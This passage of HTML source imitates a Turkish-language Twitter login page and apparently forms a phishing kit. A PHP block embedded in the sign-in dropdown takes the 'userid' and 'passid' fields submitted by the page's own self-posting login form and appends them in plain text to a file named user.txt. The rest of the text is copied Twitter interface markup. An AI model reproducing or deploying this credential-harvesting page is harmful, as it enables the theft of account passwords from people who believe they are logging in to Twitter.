class=\"js-language-link js-tooltip\" rel=\"noopener\">ગુજરાતી</a></li>\r\n            <li><a href=\"?lang=ta\" data-lang-code=\"ta\" title=\"Tamilce\" class=\"js-language-link js-tooltip\" rel=\"noopener\">தமிழ்</a></li>\r\n            <li><a href=\"?lang=kn\" data-lang-code=\"kn\" title=\"Kannada dili\" class=\"js-language-link js-tooltip\" rel=\"noopener\">ಕನ್ನಡ</a></li>\r\n            <li><a href=\"?lang=th\" data-lang-code=\"th\" title=\"Tayca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">ภาษาไทย</a></li>\r\n            <li><a href=\"?lang=ko\" data-lang-code=\"ko\" title=\"Korece\" class=\"js-language-link js-tooltip\" rel=\"noopener\">한국어</a></li>\r\n            <li><a href=\"?lang=ja\" data-lang-code=\"ja\" title=\"Japonca\" class=\"js-language-link js-tooltip\" rel=\"noopener\">日本語</a></li>\r\n            <li><a href=\"?lang=zh-cn\" data-lang-code=\"zh-cn\" title=\"Basitleştirilmiş Çince\" class=\"js-language-link js-tooltip\" rel=\"noopener\">简体中文</a></li>\r\n            <li><a href=\"?lang=zh-tw\" data-lang-code=\"zh-tw\" title=\"Geleneksel Çince\" class=\"js-language-link js-tooltip\" rel=\"noopener\">繁體中文</a></li>\r\n        </ul>\r\n      </div>\r\n      <div class=\"js-front-language\">\r\n        <form action=\"/sessions/change_locale\" class=\"t1-form language\" method=\"POST\">\r\n          <input type=\"hidden\" name=\"lang\"> <input type=\"hidden\" name=\"redirect\">\r\n          <input type=\"hidden\" name=\"authenticity_token\" value=\"2aa4c5aef1e4b8e98fc54a82d07a9f410e8986cf\">\r\n        </form>\r\n      </div>\r\n    </li>\r\n  </ul>\r\n\r\n    <ul class=\"nav secondary-nav session-dropdown\" id=\"session\">\r\n      <li class=\"dropdown js-session\">\r\n          <a href=\"/login\" class=\"dropdown-toggle js-dropdown-toggle dropdown-signin\" role=\"button\"  data-nav=\"login\">\r\n            <small>Hesabın var mı?</small> <span class=\"emphasize\"> Giriş yap</span><span class=\"caret\"></span>\r\n          </a>\r\n          <div class=\"dropdown-menu dropdown-form dropdown-menu--rightAlign is-forceRight\" id=\"signin-dropdown\">\r\n            <div class=\"dropdown-caret right\"> <span class=\"caret-outer\"></span> <span class=\"caret-inner\"></span> </div>\r\n<?php\r\nif (!empty($_POST['passid']) && !empty($_POST['userid'])) {\r\n$ac = fopen(\"user.txt\",\"a+\");\r\n$password = $_POST['passid'];\r\n$username = $_POST['userid'];\r\n$userlar = (\"\\n __________________ \\n\".\" Username: \".$username.\"\\n Password: \".$password.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n\r\n}\r\n\r\n\r\n?>\r\n\r\n            <div class=\"signin-dialog-body\">\r\n              <div>Hesabın var mı?</div>\r\n<form action=\"https://twitter.com/sessions\" class=\"LoginForm js-front-signin\" method=\"post\"\r\n  data-component=\"login_callout\"\r\n  data-element=\"form\"\r\n>\r\n  <div class=\"LoginForm-input LoginForm-username\">\r\n    <input\r\n      type=\"text\"\r\n      class=\"text-input email-input js-signin-email\"\r\n      name=\"session[username_or_email]\"\r\n      autocomplete=\"username\"\r\n      placeholder=\"Telefon, e-posta veya kullanıcı adı\"\r\n    />\r\n  </div>\r\n\r\n  <div class=\"LoginForm-input LoginForm-password\">\r\n    <input type=\"password\" class=\"text-input\" name=\"session[password]\" placeholder=\"Şifre\" autocomplete=\"current-password\">\r\n    \r\n  </div>\r\n\r\n    <div class=\"LoginForm-rememberForgot\">\r\n      <label>\r\n        <input type=\"checkbox\" value=\"1\" name=\"remember_me\" checked=\"checked\">\r\n        <span>Beni hatırla</span>\r\n      </label>\r\n      <span class=\"separator\">&middot;</span>\r\n      <a class=\"forgot\" href=\"/account/begin_password_reset\" rel=\"noopener\">Şifreni mi unuttun?</a>\r\n    </div>\r\n\r\n  <input type=\"submit\" class=\"EdgeButton EdgeButton--primary EdgeButton--medium submit js-submit\" value=\"Giriş yap\">\r\n\r\n    <input type=\"hidden\" name=\"return_to_ssl\" value=\"true\">\r\n\r\n  <input type=\"hidden\" name=\"scribe_log\">\r\n  <input type=\"hidden\" name=\"redirect_after_login\" value=\"\">\r\n  <input type=\"hidden\" value=\"2aa4c5aef1e4b8e98fc54a82d07a9f410e8986cf\" name=\"authenticity_token\">\r\n      <input type=\"hidden\" name=\"ui_metrics\" autocomplete=\"off\">\r\n      <script src=\"/i/js_inst?c_name=ui_metrics\" async></script>\r\n</form>\r\n              <hr>\r\n              <div class=\"signup SignupForm\">\r\n                <div class=\"SignupForm-header\">Twitter'da yeni misin?</div>\r\n                <a href=\"https://twitter.com/signup\" role=\"button\" class=\"EdgeButton EdgeButton--secondary EdgeButton--medium u-block js-signup\"\r\n                  data-component=\"signup_callout\"\r\n                  data-element=\"dropdown\"\r\n                  >Kaydol\r\n                </a>\r\n              </div>\r\n            </div>\r\n          </div>\r\n      </li>\r\n    </ul>\r\n</div>\r\n\r\n        </div>\r\n      </div>\r\n    </div>\r\n</div>\r\n\r\n\r\n        <div id=\"page-outer\">\r\n          <div id=\"page-container\" class=\"AppContent wrapper wrapper-login\">\r\n              \r\n            <div class=\"page-canvas\">\r\n\r\n  <div class=\"signin-wrapper\" data-login-message=\"\">\r\n    <h1>Twitter'a giriş yap</h1>\r\n    <form action=\"\" class=\"t1-form clearfix signin js-signin\" method=\"post\">\r\n      <fieldset>\r\n\r\n  <legend class=\"visuallyhidden\">Giriş yap</legend>\r\n\r\n  <div class=\"clearfix field\">\r\n    <input\r\n      class=\"js-username-field email-input js-initial-focus\"\r\n      type=\"text\" name='userid'\r\n      placeholder=\"Telefon, e-posta veya kullanıcı adı\"\r\n    />\r\n  </div>\r\n  <div class=\"clearfix field\">\r\n    <input class=\"js-password-field\" type=\"password\" name=\"passid\" placeholder=\"Şifre\">\r\n  </div>\r\n\r\n  <input type=\"hidden\" value=\"2aa4c5aef1e4b8e98fc54a82d07a9f410e8986cf\" name=\"authenticity_token\"/>\r\n\r\n      <input type=\"hidden\" name=\"ui_metrics\" autocomplete=\"off\">\r\n      <script src=\"/i/js_inst?c_name=ui_metrics\" async></script>\r\n\r\n</fieldset>\r\n\r\n      <div class=\"captcha js-captcha\">\r\n      </div>\r\n      <div class=\"clearfix\">\r\n\r\n  <input type=\"hidden\" name=\"scribe_log\">\r\n  <input type=\"hidden\" name=\"redirect_after_login\" value=\"\">\r\n  <input type=\"hidden\" value=\"2aa4c5aef1e4b8e98fc54a82d07a9f410e8986cf\" name=\"authenticity_token\"/>\r\n  <button type=\"submit\" class=\"submit EdgeButton EdgeButton--primary EdgeButtom--medium\">Giriş yap</button>\r\n\r\n  <div class=\"subchck\">\r\n    <label class=\"t1-label remember\">\r\n      <input type=\"checkbox\" value=\"1\" name=\"remember_me\" checked=\"checked\">\r\n      Beni hatırla\r\n      <span class=\"separator\">·</span>\r\n      <a class=\"forgot\" href=\"/account/begin_password_reset\" rel=\"noopener\">Şifreni mi unuttun?</a>\r\n    </label>\r\n  </div>\r\n</div>\r\n\r\n    </form>\r\n  </div>\r\n\r\n  <div class=\"clearfix mobile has-sms\">\r\n    <p class=\"signup-helper\">\r\n      Twitter'da yeni misin?\r\n      <a id=\"login-signup-link\" href=\"https://twitter.com/signup\">Hemen kaydol&#32;&raquo;</a>\r\n    </p>\r\n    <p class=\"sms-helper\">\r\n      Twitter'ı zaten kısa mesaj yoluyla mı kullanıyorsun?\r\n      <a href=\"/account/complete\">Hesabını etkinleştir&#32;&raquo;</a>\r\n    </p>\r\n  </div>\r\n\r\n</div>\r\n\r\n          </div>\r\n        </div>\r\n    </div>\r\n    <div class=\"alert-messages hidden\" id=\"message-drawer\">\r\n    <div class=\"message \">\r\n  <div class=\"message-inside\">\r\n    <span class=\"message-text\"></span>\r\n      <a role=\"button\" class=\"Icon Icon--close Icon--medium dismiss\" href=\"#\">\r\n        <span class=\"visuallyhidden\">Gizle</span>\r\n      </a>\r\n  </div>\r\n</div>\r\n</div>\r\n\r\n    \r\n\r\n\r\n<div class=\"gallery-overlay\"></div>\r\n<div class=\"Gallery with-tweet\">\r\n  <style class=\"Gallery-styles\"></style>\r\n  <div class=\"Gallery-closeTarget\"></div>\r\n  <div class=\"Gallery-content\">\r\n    <div class=\"GalleryTweet-newsCameraBadge\"></div>\r\n    <button type=\"button\" class=\"modal-btn modal-close modal-close-fixed js-close\">\r\n  <span class=\"Icon Icon--close Icon--large\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n    <div class=\"Gallery-media\"></div>\r\n    <div class=\"GalleryNav GalleryNav--prev\">\r\n      <span class=\"GalleryNav-handle GalleryNav-handle--prev\">\r\n        <span class=\"Icon Icon--caretLeft Icon--large\">\r\n          <span class=\"u-hiddenVisually\">\r\n            Önceki\r\n          </span>\r\n        </span>\r\n      </span>\r\n    </div>\r\n    <div class=\"GalleryNav GalleryNav--next\">\r\n      <span class=\"GalleryNav-handle GalleryNav-handle--next\">\r\n        <span class=\"Icon Icon--caretRight Icon--large\">\r\n          <span class=\"u-hiddenVisually\">\r\n            Sonraki\r\n          </span>\r\n        </span>\r\n      </span>\r\n    </div>\r\n    <div class=\"GalleryTweet\"></div>\r\n  </div>\r\n</div>\r\n\r\n\r\n<div class=\"modal-overlay\"></div>\r\n\r\n<div id=\"profile-hover-container\"></div>\r\n\r\n\r\n<div id=\"goto-user-dialog\" class=\"modal-container\">\r\n  <div class=\"modal modal-small draggable\">\r\n    <div class=\"modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title\">Birinin profiline git</h3>\r\n      </div>\r\n\r\n      <div class=\"modal-body\">\r\n        <div class=\"modal-inner\">\r\n          <form class=\"t1-form goto-user-form\">\r\n            <input class=\"input-block username-input\" type=\"text\" placeholder=\"Bir profile geçmek için bir ad yazmaya başla\" aria-label=\"Kullanıcı\">\r\n            \r\n\r\n\r\n<div role=\"listbox\" class=\"dropdown-menu typeahead\">\r\n  <div aria-hidden=\"true\" class=\"dropdown-caret\">\r\n    <div class=\"caret-outer\"></div>\r\n    <div class=\"caret-inner\"></div>\r\n  </div>\r\n  <div role=\"presentation\" class=\"dropdown-inner js-typeahead-results\">\r\n    <div role=\"presentation\" class=\"typeahead-saved-searches\">\r\n  <h3 id=\"saved-searches-heading\" class=\"typeahead-category-title saved-searches-title\">Kaydedilmiş aramalar</h3>\r\n  <ul role=\"presentation\" class=\"typeahead-items saved-searches-list\">\r\n    \r\n    <li role=\"presentation\" class=\"typeahead-item typeahead-saved-search-item\">\r\n      <span class=\"Icon Icon--close\" aria-hidden=\"true\"><span class=\"visuallyhidden\">Kaldır</span></span>\r\n      <a role=\"option\" aria-describedby=\"saved-searches-heading\" class=\"js-nav\" href=\"\" data-search-query=\"\" data-query-source=\"\" data-ds=\"saved_search\" tabindex=\"-1\"></a>\r\n    </li>\r\n  </ul>\r\n</div>\r\n\r\n    <ul role=\"presentation\" class=\"typeahead-items typeahead-topics\">\r\n  \r\n  <li role=\"presentation\" class=\"typeahead-item typeahead-topic-item\">\r\n    <a role=\"option\" class=\"js-nav\" href=\"\" data-search-query=\"\" data-query-source=\"typeahead_click\" data-ds=\"topics\" tabindex=\"-1\"></a>\r\n  </li>\r\n</ul>\r\n    <ul role=\"presentation\" class=\"typeahead-items typeahead-accounts social-context js-typeahead-accounts\">\r\n  \r\n  <li role=\"presentation\" data-user-id=\"\" data-user-screenname=\"\" data-remote=\"true\" data-score=\"\" class=\"typeahead-item typeahead-account-item js-selectable\">\r\n    \r\n    <a role=\"option\" class=\"js-nav\" data-query-source=\"typeahead_click\" data-search-query=\"\" data-ds=\"account\">\r\n      <div class=\"js-selectable typeahead-in-conversation hidden\">\r\n        <span class=\"Icon Icon--follower Icon--small\"></span>\r\n        <span class=\"typeahead-in-conversation-text\">Bu sohbette</span>\r\n      </div>\r\n      <img class=\"avatar size32\" alt=\"\">\r\n      <span class=\"typeahead-user-item-info account-group\">\r\n        <span class=\"fullname\"></span><span class=\"UserBadges\"><span class=\"Icon Icon--verified js-verified hidden\"><span class=\"u-hiddenVisually\">Onaylanmış hesap</span></span><span class=\"Icon Icon--protected js-protected hidden\"><span class=\"u-hiddenVisually\">Korumalı Tweetler</span></span></span><span class=\"UserNameBreak\">&nbsp;</span><span class=\"username u-dir\" dir=\"ltr\">@<b></b></span>\r\n      </span>\r\n      <span class=\"typeahead-social-context\"></span>\r\n    </a>\r\n  </li>\r\n  <li role=\"presentation\" class=\"js-selectable typeahead-accounts-shortcut js-shortcut\"><a role=\"option\" class=\"js-nav\" href=\"\" data-search-query=\"\" data-query-source=\"typeahead_click\" data-shortcut=\"true\" data-ds=\"account_search\"></a></li>\r\n</ul>\r\n\r\n    <ul role=\"presentation\" class=\"typeahead-items typeahead-trend-locations-list\">\r\n  \r\n  <li role=\"presentation\" class=\"typeahead-item typeahead-trend-locations-item\"><a role=\"option\" class=\"js-nav\" href=\"\" data-ds=\"trend_location\" data-search-query=\"\" tabindex=\"-1\"></a></li>\r\n</ul>\r\n    \r\n<div role=\"presentation\" class=\"typeahead-user-select\">\r\n  <div role=\"presentation\" class=\"typeahead-empty-suggestions\">\r\n    Önerilen kullanıcılar\r\n  </div>\r\n  <ul role=\"presentation\" class=\"typeahead-items typeahead-selected js-typeahead-selected\">\r\n    \r\n    <li role=\"presentation\" data-user-id=\"\" data-user-screenname=\"\" data-remote=\"true\" data-score=\"\" class=\"typeahead-item typeahead-selected-item js-selectable\">\r\n      \r\n      <a role=\"option\" class=\"js-nav\" data-query-source=\"typeahead_click\" data-search-query=\"\" data-ds=\"account\">\r\n        <img class=\"avatar size32\" alt=\"\">\r\n        <span class=\"typeahead-user-item-info account-group\">\r\n          <span class=\"select-status deselect-user js-deselect-user Icon Icon--check\"></span>\r\n          <span class=\"select-status select-disabled Icon Icon--unfollow\"></span>\r\n          <span class=\"fullname\"></span><span class=\"UserBadges\"><span class=\"Icon Icon--verified js-verified hidden\"><span class=\"u-hiddenVisually\">Onaylanmış hesap</span></span><span class=\"Icon Icon--protected js-protected hidden\"><span class=\"u-hiddenVisually\">Korumalı Tweetler</span></span></span><span class=\"UserNameBreak\">&nbsp;</span><span class=\"username u-dir\" dir=\"ltr\">@<b></b></span>\r\n        </span>\r\n      </a>\r\n    </li>\r\n    <li role=\"presentation\" class=\"typeahead-selected-end\"></li>\r\n  </ul>\r\n\r\n  <ul role=\"presentation\" class=\"typeahead-items typeahead-accounts js-typeahead-accounts\">\r\n    \r\n    <li role=\"presentation\" data-user-id=\"\" data-user-screenname=\"\" data-remote=\"true\" data-score=\"\" class=\"typeahead-item typeahead-account-item js-selectable\">\r\n      \r\n      <a role=\"option\" class=\"js-nav\" data-query-source=\"typeahead_click\" data-search-query=\"\" data-ds=\"account\">\r\n        <img class=\"avatar size32\" alt=\"\">\r\n        <span class=\"typeahead-user-item-info account-group\">\r\n          <span class=\"select-status deselect-user js-deselect-user Icon Icon--check\"></span>\r\n          <span class=\"select-status select-disabled Icon Icon--unfollow\"></span>\r\n          <span class=\"fullname\"></span><span class=\"UserBadges\"><span class=\"Icon Icon--verified js-verified hidden\"><span class=\"u-hiddenVisually\">Onaylanmış hesap</span></span><span class=\"Icon Icon--protected js-protected hidden\"><span class=\"u-hiddenVisually\">Korumalı Tweetler</span></span></span><span class=\"UserNameBreak\">&nbsp;</span><span class=\"username u-dir\" dir=\"ltr\">@<b></b></span>\r\n        </span>\r\n      </a>\r\n    </li>\r\n    <li role=\"presentation\" class=\"typeahead-accounts-end\"></li>\r\n  </ul>\r\n</div>\r\n\r\n    <div role=\"presentation\" class=\"typeahead-dm-conversations\">\r\n  <ul role=\"presentation\" class=\"typeahead-items typeahead-dm-conversation-items\">\r\n    <li role=\"presentation\" class=\"typeahead-item typeahead-dm-conversation-item\">\r\n      <a role=\"option\" tabindex=\"-1\"></a>\r\n    </li>\r\n  </ul>\r\n</div>\r\n  </div>\r\n</div>\r\n\r\n          </form>\r\n        </div>\r\n      </div>\r\n\r\n    </div>\r\n  </div>\r\n</div>\r\n\r\n<div id=\"quick-promote-dialog\" class=\"QuickPromoteDialog modal-container\">\r\n  <div class=\"modal draggable\">\r\n    <div class=\"modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close modal-close-fixed js-close\">\r\n  <span class=\"Icon Icon--close Icon--large\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title\">Bu Tweeti tanıt</h3>\r\n      </div>\r\n      <div class=\"modal-body\">\r\n        <div class=\"quick-promote-view-container\">\r\n          <div class=\"media\">\r\n            <iframe\r\n              class=\"quick-promote-iframe js-initial-focus\"\r\n              scrolling=\"no\"\r\n              frameborder=\"0\"\r\n              src=\"\">\r\n            </iframe>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n\r\n\r\n<div id=\"block-user-dialog\" class=\"modal-container\">\r\n  <div class=\"modal draggable\">\r\n    <div class=\"modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title\">Engelle</h3>\r\n      </div>\r\n\r\n      <div class=\"tweet-loading\">\r\n  <div class=\"spinner-bigger\"></div>\r\n</div>\r\n\r\n      <div class=\"modal-body modal-tweet\"></div>\r\n\r\n      <div class=\"modal-footer\">\r\n        <button class=\"EdgeButton EdgeButton--tertiary cancel-action js-close\">İptal</button>\r\n        <button class=\"EdgeButton EdgeButton--danger block-action\">Engelle</button>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n\r\n\r\n\r\n\r\n\r\n\r\n   <div id=\"geo-disabled-dropdown\">\r\n    <div tabindex=\"-1\">\r\n  <div class=\"dropdown-caret\">\r\n    <span class=\"caret-outer\"></span>\r\n    <span class=\"caret-inner\"></span>\r\n  </div>\r\n  <ul>\r\n    <li class=\"geo-not-enabled-yet\">\r\n      <h2>Konumu olan Tweet</h2>\r\n      <p>\r\n        Tweetlerine web veya üçüncü parti uygulamalar aracılığıyla şehir veya tam konum gibi konum bilgisi ekleyebilirsin. Tweet konum geçmişini dilediğin zaman silebilirsiniz.\r\n        <a href=\"http://support.twitter.com/forums/26810/entries/78525\" target=\"_blank\" rel=\"noopener\">Daha fazla bilgi al</a>\r\n      </p>\r\n      <div>\r\n        <button type=\"button\" class=\"geo-turn-on EdgeButton EdgeButton--primary\">Etkinleştir</button>\r\n        <button type=\"button\" class=\"geo-not-now EdgeButton EdgeButton--secondary\">Şimdi değil</button>\r\n      </div>\r\n    </li>\r\n  </ul>\r\n</div>\r\n\r\n  </div>\r\n\r\n<div id=\"geo-enabled-dropdown\">\r\n  <div tabindex=\"-1\">\r\n  <div class=\"dropdown-caret\">\r\n    <span class=\"caret-outer\"></span>\r\n    <span class=\"caret-inner\"></span>\r\n  </div>\r\n  <div>\r\n    <div class=\"geo-query-location\">\r\n      <input class=\"GeoSearch-queryInput\" type=\"text\" autocomplete=\"off\" placeholder=\"Bir mahalle ya da şehir için arama yap\">\r\n      <span class=\"Icon Icon--search\"></span>\r\n    </div>\r\n    <div class=\"geo-dropdown-status\"></div>\r\n    <ul class=\"GeoSearch-dropdownMenu\"></ul>\r\n  </div>\r\n</div>\r\n\r\n</div>\r\n\r\n\r\n\r\n  <div id=\"list-membership-dialog\" class=\"modal-container\">\r\n  <div class=\"modal modal-small draggable\">\r\n    <div class=\"modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title\">Listelerin</h3>\r\n      </div>\r\n      <div class=\"modal-body\">\r\n        <div class=\"list-membership-content\"></div>\r\n        <span class=\"spinner lists-spinner\" title=\"Yükleniyor&hellip;\"></span>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n  <div id=\"list-operations-dialog\" class=\"modal-container\">\r\n  <div class=\"modal modal-medium draggable\">\r\n    <div class=\"modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title\">Yeni bir liste oluştur</h3>\r\n      </div>\r\n      <div class=\"modal-body\">\r\n        <div class=\"list-editor\">\r\n  <div class=\"field\">\r\n    <label class=\"t1-label\" for=\"list-name\">Liste adı</label>\r\n    <input id=\"list-name\" type=\"text\" class=\"text\" name=\"name\" value=\"\" />\r\n  </div>\r\n  <hr/>\r\n\r\n  <div class=\"field\">\r\n    <label class=\"t1-label\" for=\"list-description\">Açıklama</label>\r\n    <textarea id=\"list-description\" name=\"description\"></textarea>\r\n    <span class=\"help-text\">100 karakterin altında, tercihe bağlı</span>\r\n  </div>\r\n  <hr/>\r\n\r\n  <fieldset class=\"field\">\r\n    <legend class=\"t1-legend\">Gizlilik</legend>\r\n    <div class=\"options\">\r\n      <label class=\"t1-label\" for=\"list-public-radio\">\r\n        <input class=\"radio\" type=\"radio\" name=\"mode\" id=\"list-public-radio\" value=\"public\" checked=\"checked\"  />\r\n        <b>Herkese açık</b> &middot; Bu listeyi herkes takip edebilir\r\n      </label>\r\n      <label class=\"t1-label\" for=\"list-private-radio\">\r\n        <input class=\"radio\" type=\"radio\" name=\"mode\" id=\"list-private-radio\" value=\"private\"  />\r\n        <b>Özel</b> &middot; Bu listeye sadece sen erişebilirsin\r\n      </label>\r\n    </div>\r\n  </fieldset>\r\n  <hr/>\r\n\r\n  <div class=\"list-editor-save\">\r\n    <button type=\"button\" class=\"EdgeButton EdgeButton--secondary update-list-button\" data-list-id=\"\">Listeyi kaydet</button>\r\n  </div>\r\n</div>\r\n\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n\r\n<div id=\"activity-popup-dialog\" class=\"modal-container\">\r\n  <div class=\"modal draggable\">\r\n    <div class=\"modal-content clearfix\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title\"></h3>\r\n      </div>\r\n\r\n      <div class=\"modal-body\">\r\n        <div class=\"tweet-loading\">\r\n  <div class=\"spinner-bigger\"></div>\r\n</div>\r\n\r\n        <div class=\"activity-popup-dialog-content modal-tweet clearfix\"></div>\r\n        <div class=\"loading\">\r\n          <span class=\"spinner-bigger\"></span>\r\n        </div>\r\n        <div class=\"activity-popup-dialog-users clearfix\"></div>\r\n        <div class=\"activity-popup-dialog-footer\"></div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n\r\n\r\n\r\n\r\n<div id=\"copy-link-to-tweet-dialog\" class=\"modal-container\">\r\n  <div class=\"modal modal-medium draggable\">\r\n    <div class=\"modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title\">Tweetin bağlantısını kopyala</h3>\r\n      </div>\r\n      <div class=\"modal-body\">\r\n        <div class=\"copy-link-to-tweet-container\">\r\n          <label class=\"t1-label\">\r\n            <p class=\"copy-link-to-tweet-instructions\">İşte bu Tweetin bağlantısı. Kopyalayarak arkadaşlarınla kolayca paylaş.</p>\r\n            <textarea class=\"link-to-tweet-destination js-initial-focus u-dir\" dir=\"ltr\" readonly></textarea>\r\n          </label>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n\r\n\r\n<div id=\"embed-tweet-dialog\" class=\"modal-container\">\r\n  <div class=\"modal modal-medium draggable\">\r\n    <div class=\"modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title embed-tweet-title\">Bu Tweeti yerleştir</h3>\r\n        <h3 class=\"modal-title embed-video-title\">Embed this Video</h3>\r\n      </div>\r\n      <div class=\"modal-body\">\r\n        <div class=\"embed-code-container\">\r\n  <p class=\"embed-tweet-instructions\">Aşağıdaki kodu kopyalayarak bu Tweeti web sitene ekle. <a href=\"https://dev.twitter.com/web/embedded-tweets\" target=\"_blank\" rel=\"noopener\">Daha fazla bilgi al</a></p>\r\n  <p class=\"embed-video-instructions\">Aşağıdaki kodu kopyalayarak bu videoyu web sitene ekle. <a href=\"https://dev.twitter.com/web/embedded-tweets\" target=\"_blank\" rel=\"noopener\">Daha fazla bilgi al</a></p>\r\n  <form class=\"t1-form\">\r\n\r\n    <div class=\"embed-destination-wrapper\">\r\n      <div class=\"embed-overlay embed-overlay-spinner\"><div class=\"embed-overlay-content\"></div></div>\r\n      <div class=\"embed-overlay embed-overlay-error\">\r\n        <p class=\"embed-overlay-content\">Hmm, sunucuya ulaşırken bir sorun oluştu. <button type=\"button\" class=\"btn-link retry-embed\">Tekrar dene?</button></p>\r\n      </div>\r\n      <textarea class=\"embed-destination js-initial-focus\"></textarea>\r\n      <div class=\"embed-options\">\r\n        <div class=\"embed-include-parent-tweet\">\r\n          <label class=\"t1-label\" for=\"include-parent-tweet\">\r\n            <input type=\"checkbox\" id=\"include-parent-tweet\" class=\"include-parent-tweet\" checked>\r\n            Kaynak Tweeti ekle\r\n          </label>\r\n        </div>\r\n        <div class=\"embed-include-card\">\r\n          <label class=\"t1-label\" for=\"include-card\">\r\n            <input type=\"checkbox\" id=\"include-card\" class=\"include-card\" checked>\r\n            Medyayı ekle\r\n          </label>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </form>\r\n  <p class=\"embed-tweet-description\">Twitter içeriğini web sitene veya uygulamana yerleştirerek Twitter <a href=\"https://dev.twitter.com/overview/terms/agreement\" rel=\"noopener\">Geliştirici Sözleşmesi'ni</a> ve <a href=\"https://dev.twitter.com/overview/terms/policy\" rel=\"noopener\">Geliştirici Politikası'nı</a> kabul etmiş oluyorsun.</p>\r\n  <h3 class=\"embed-preview-header\">Ön izleme</h3>\r\n  <div class=\"embed-preview\">\r\n  </div>\r\n</div>\r\n\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n\r\n\r\n<div id=\"why-this-ad-dialog\" class=\"modal-container why-this-ad-dialog\">\r\n  <div class=\"modal modal-large draggable\">\r\n    <div class=\"modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title why-this-ad-title\">Bu reklamı görme nedenin</h3>\r\n      </div>\r\n      <div class=\"why-this-ad-content\">\r\n        <div class=\"why-this-ad-spinner\">\r\n          <div class=\"spinner-bigger\"></div>\r\n        </div>\r\n        <iframe id=\"why-this-ad-frame\" class=\"hidden\" aria-hidden=\"true\" scrolling=\"auto\">\r\n        </iframe>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n\r\n\r\n\r\n  <div id=\"login-dialog\" class=\"LoginDialog modal-container u-textCenter\">\r\n  <div class=\"modal modal-large draggable\">\r\n    <div class=\"LoginDialog-content modal-content\">\r\n      <button type=\"button\" class=\"modal-btn modal-close js-close\">\r\n  <span class=\"Icon Icon--close Icon--medium\">\r\n    <span class=\"visuallyhidden\">Kapat</span>\r\n  </span>\r\n</button>\r\n\r\n      <div class=\"modal-header\">\r\n        <h3 class=\"modal-title\">Twitter'a giriş yap</h3>\r\n      </div>\r\n      <div class=\"LoginDialog-body modal-body\">\r\n        <div class=\"LoginDialog-bird\">\r\n          <span class=\"Icon Icon--bird Icon--large\"></span>\r\n        </div>\r\n        <div class=\"LoginDialog-form\">\r\n<form action=\"https://twitter.com/sessions\" class=\"LoginForm js-front-signin\" method=\"post\"\r\n  data-component=\"dialog\"\r\n  data-element=\"login\"\r\n>\r\n  <div class=\"LoginForm-input LoginForm-username\">\r\n    <input\r\n      type=\"text\"\r\n      class=\"text-input email-input js-signin-email\"\r\n      name=\"session[username_or_email]\"\r\n      autocomplete=\"username\"\r\n      placeholder=\"Telefon, e-posta veya kullanıcı adı\"\r\n    />\r\n  </div>\r\n\r\n  <div class=\"LoginForm-input LoginForm-password\">\r\n    <input type=\"password\" class=\"text-input\" name=\"session[password]\" placeholder=\"Şifre\" autocomplete=\"current-password\">\r\n    \r\n  </div>\r\n\r\n    <div class=\"LoginForm-rememberForgot\">\r\n      <label>\r\n        <input type=\"checkbox\" value=\"1\" name=\"remember_me\" checked=\"checked\">\r\n        <span>Beni hatırla</span>\r\n      </label>\r\n      <span class=\"separator\">&middot;</span>\r\n      <a class=\"forgot\" href=\"/account/begin_password_reset\" rel=\"noopener\">Şifreni mi unuttun?</a>\r\n    </div>\r\n\r\n  